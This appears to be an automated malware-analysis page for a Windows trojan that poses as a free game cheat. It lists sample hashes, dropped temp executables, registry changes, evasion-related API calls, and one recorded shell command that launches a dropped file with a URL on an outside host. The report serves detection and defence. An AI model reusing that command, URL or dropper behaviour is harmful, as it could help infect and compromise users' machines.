Trojan.MSIL.Agent.XN

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 17,182
Threat Level: 80% (High)
Infected Computers: 7
First Seen: May 23, 2024
Last Seen: March 3, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.MSIL.Agent.XN
Signature status: No Signature

Known Samples

MD5: 4920d12d5fac236a8f26960256441aec
SHA1: edbecca860460ab9495f3d8449fd7ee0cb1aabef
SHA256: F1F8A9D20356F57E35336BC00975898629EC96D18BDFCD3A73ACE547CD51673B
File Size: 172.54 KB, 172544 bytes

MD5: 5f1e36e2d603ac7786d3a659023154a5
SHA1: 8be4f619a5e76b89e8da1ac6b0e74b34dd6f8246
SHA256: 95E97C3B6EF70ACB81CAD40648D6D60AB0CD7A7828B6F12EB604D814F02B1D44
File Size: 59.76 KB, 59760 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is .NET application
  • File is 32-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

Windows PE Version Information

Assembly Version: 1.0.0.0
Comments: RCheatsGanteng
Company Name: RCheatsGanteng
File Description: FreeTrialPB
File Version: 1.0.0.0
Internal Name: FreeTrialPB.exe
Legal Copyright: Copyright © 2025
Original Filename: FreeTrialPB.exe
Product Name: RCheatsGanteng
Product Version: 1.0.0.0

File Traits

  • .NET
  • Default Version Info
  • x86

Similar Families

  • MSIL.Agent.XN

Files Modified

File Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe.config Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe.config Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe.config Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe.config Synchronize,Write Attributes

Registry Modifications

Key::Value Data API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe (binary data) RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations *1\??\C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe.old5af52*1\??\C:\Windows\SystemTemp\CopilotUpdate.exe.old5af62*1\??\C:\P RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey

Windows API Usage

Category API
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Other Suspicious
  • AdjustTokenPrivileges
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • ShellExecuteEx
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Process Terminate
  • TerminateProcess

Shell Command Execution

(NULL) "C:\Users\Hqegudeb\AppData\Local\Temp\nszB9B1.tmp\noiusfgew.exe" "http://www.criersvivant.PW/ee/78110290?2429963f2429963=1584986378049441200=1- 8182"
